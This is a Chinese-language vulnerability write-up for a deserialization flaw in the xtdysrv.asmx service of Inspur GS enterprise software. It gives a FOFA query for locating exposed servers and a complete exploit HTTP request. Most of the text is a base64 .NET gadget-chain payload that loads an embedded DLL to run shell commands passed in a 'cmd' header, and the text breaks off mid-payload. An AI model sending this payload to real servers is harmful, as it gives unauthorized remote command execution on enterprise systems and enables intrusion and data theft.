+浪潮GS 面向大中型集团企业采用SOA 架构和先进开放的GSP 应用中间件开发，形成了集团管控13 大领域15 大行业60余个细分行业的解决方案。在管理方面，浪潮GS 有效帮助企业有效实现财务集中管理、资金集中管理、资产集中管理、供应链集中管理，从而达到集团信息的集中监控以及企业集团成员之间资源共享、合作共赢、共同发展。在业务方面，浪潮GS 支持供应链协同、生产管理协同，打破企业资源（人、财、物、信息、流程等）之间的各种壁垒和边界，帮助企业实现内外供应链的全面管理，从而提高了整个产业链对客户的反应速度。浪潮GS企业管理软件xtdysrv存在反序列化漏洞，未经授权的攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 浪潮GS企业管理软件
+
+# 三、资产测绘
++ fofa`"cwbase/web/scripts/aes.js"`
++ 特征
+
+![1721710099660-ce971b9e-7f81-4943-b6d6-ce4bcaa73467.png](./img/1hmSSjw47lb-A9Dr/1721710099660-ce971b9e-7f81-4943-b6d6-ce4bcaa73467-912710.png)
+
+# 四、漏洞复现
+```plain
+POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+cmd: whoami
+SOAPAction: "http://tempuri.org/SavePrintFormatAssign"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <SavePrintFormatAssign xmlns="http://tempuri.org/">
+      <psBizObj>string</psBizObj>
+      <psLxId>string</psLxId>
+      <psLxMc>string</psLxMc>
+      <printOpByte>AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dH